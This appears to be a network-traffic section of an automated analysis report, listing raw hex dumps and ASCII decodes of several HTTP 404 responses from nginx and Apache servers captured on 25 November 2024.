                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:44:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:44:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:44:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 08:44:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 08:44:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 08:44:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 08:44:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 08:44:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 08:45:22 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 08:45:24 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 08:45:30 GMTContent-Type: text/htmlContent-Length: 19268Connection: closeServer: ApacheLast-Modified: Tue, 25 Jan 2022 07:25:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 